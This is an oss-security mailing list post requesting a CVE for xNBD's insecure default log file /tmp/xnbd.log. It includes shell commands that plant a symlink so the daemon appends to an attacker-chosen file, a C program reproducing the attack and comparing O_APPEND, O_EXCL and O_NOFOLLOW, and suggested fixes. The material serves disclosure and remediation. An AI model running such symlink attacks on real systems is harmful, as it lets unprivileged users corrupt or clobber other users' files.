oss-sec mailing list archives
CVE request: Insecure default log file path in xNBD
From: Sebastian Pipping <sebastian () pipping org>
Date: Wed, 06 Feb 2013 17:48:59 +0100
Hello oss-security!

Target software
===============
xNBD upstream
  https://bitbucket.org/hirofuchi/xnbd
Official Debian packages
  http://packages.debian.org/sid/xnbd-server

Description
===========
xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log for
logging when parameter --daemonize (and no --logpath FILE) is given.
The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there is
a vulnerability against symlink attacks.

Demonstration
=============
Here is an exploitation example:

  $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
  $ touch DISK
  $ truncate --size=$((100*1024**2)) DISK
  $ /usr/sbin/xnbd-server --daemonize --target DISK
  xnbd-server(12462) msg: daemonize enabled
  xnbd-server(12462) msg: cmd target mode
  xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
  xnbd-server(12462) msg: xnbd master initialization done
  xnbd-server(12462) msg: logfile /tmp/xnbd.log
  $ ls -l ~/ATTACK_TARGET
  -rw------- 1 user123 user123 653 Feb 1 16:41 \
      /home/user123/ATTACK_TARGET

Affected versions
=================
The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

----------------------------------------------------------------------
Version                            Status
----------------------------------------------------------------------
0.0.x                              not analyzed
0.1.0-pre                          VULNERABLE (xnbd-server only)
0.1.0-pre-hg20-e75b93a47722-2      VULNERABLE (xnbd-server and -wrapper)
Mercurial tip                      not vulnerable
----------------------------------------------------------------------

Options for a fix
=================
a) Use syslog with --daemonize and no default file location in general
   (i.e. what upstream did)
b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log for the
   hard-coded defaults
c) Replace flag O_APPEND by O_EXCL (secure but reducing functionality)

The attached patch applies approach (b) to version
0.1.0-pre-hg20-e75b93a47722.
Best, Sebastian
Attachment:
xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch
Description:
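The attack in the post and the effect of fix option (c), reproduced as an added example in C. This is not xNBD's code and not the attached patch: it builds the scenario from the demonstration (an attacker-owned ATTACK_TARGET and a symlink named xnbd.log pointing at it) in a fresh temporary directory, then opens the symlink with the vulnerable flag set O_WRONLY | O_CREAT | O_APPEND, with O_CREAT | O_EXCL as in option (c), and with O_NOFOLLOW added, reporting whether the write landed in the target and what errno the failing variants return. The temporary directory, the file names, and the log line written are constructed for the example.

```c
/* Added example, not xNBD code: symlink attack on an O_CREAT|O_APPEND
 * log path, and how O_EXCL and O_NOFOLLOW change the outcome. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcome of one open()+write() attempt on the attacker-planted symlink. */
struct attempt {
    int opened;        /* 1 if open() succeeded */
    int err;           /* errno if open() or write() failed, else 0 */
    int wrote_target;  /* 1 if the bytes ended up in the symlink's target */
};

/* Open logpath with the given flags, append one log line, and check whether
 * target (the file the symlink points at) grew as a result. */
static struct attempt attempt_open(const char *logpath, int flags, const char *target)
{
    struct attempt a = {0, 0, 0};
    struct stat before, after;
    const char line[] = "xnbd-server(12462) msg: daemonize enabled\n"; /* constructed */

    if (stat(target, &before) != 0)
        before.st_size = 0;
    int fd = open(logpath, flags, 0600);
    if (fd < 0) {
        a.err = errno;
        return a;
    }
    a.opened = 1;
    if (write(fd, line, sizeof line - 1) < 0)
        a.err = errno;
    close(fd);
    if (stat(target, &after) == 0 && after.st_size > before.st_size)
        a.wrote_target = 1;
    return a;
}

struct scenario {
    struct attempt append;    /* O_WRONLY|O_CREAT|O_APPEND: the vulnerable default */
    struct attempt excl;      /* O_WRONLY|O_CREAT|O_EXCL: fix option (c) */
    struct attempt nofollow;  /* O_WRONLY|O_CREAT|O_APPEND|O_NOFOLLOW */
};

/* Rebuild the advisory's scenario in a throwaway directory and try all
 * three open() strategies against the same symlink. */
struct scenario run_scenario(void)
{
    struct scenario s;
    const char *base = getenv("TMPDIR");
    char dir[512], target[640], logpath[640];

    if (base == NULL)
        base = "/tmp";
    snprintf(dir, sizeof dir, "%s/xnbd-symlink-demo-XXXXXX", base);
    if (mkdtemp(dir) == NULL) { perror("mkdtemp"); exit(1); }
    snprintf(target, sizeof target, "%s/ATTACK_TARGET", dir);
    snprintf(logpath, sizeof logpath, "%s/xnbd.log", dir);

    /* Attacker step: `touch ATTACK_TARGET; ln -s ATTACK_TARGET xnbd.log`. */
    int fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) { perror("create target"); exit(1); }
    close(fd);
    if (symlink(target, logpath) != 0) { perror("symlink"); exit(1); }

    /* Victim step: the daemon opens its default log path. */
    s.append   = attempt_open(logpath, O_WRONLY | O_CREAT | O_APPEND, target);
    s.excl     = attempt_open(logpath, O_WRONLY | O_CREAT | O_EXCL, target);
    s.nofollow = attempt_open(logpath, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, target);

    unlink(logpath);
    unlink(target);
    rmdir(dir);
    return s;
}

static void report(const char *label, struct attempt a)
{
    if (a.opened)
        printf("%-18s opened, target grew: %s\n", label, a.wrote_target ? "yes" : "no");
    else
        printf("%-18s open() failed: %s\n", label, strerror(a.err));
}

int main(void)
{
    struct scenario s = run_scenario();
    report("O_APPEND:", s.append);
    report("O_EXCL:", s.excl);
    report("O_NOFOLLOW:", s.nofollow);
    return 0;
}
```

The O_APPEND variant follows the link and appends the daemon's log line to the attacker's file, which is what the `ls -l ~/ATTACK_TARGET` line in the post shows. O_CREAT | O_EXCL refuses with EEXIST because the symlink itself exists, which is why option (c) is secure but breaks reopening an existing log. O_NOFOLLOW refuses with ELOOP, but it only checks the final path component, so the sounder defaults remain the ones the post lists as (a) and (b): syslog, or a path under /var/log that unprivileged users cannot write to.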
Current thread:
- CVE request: Insecure default log file path in xNBD Sebastian Pipping (Feb 06)
- Re: CVE request: Insecure default log file path in xNBD Kurt Seifried (Feb 06)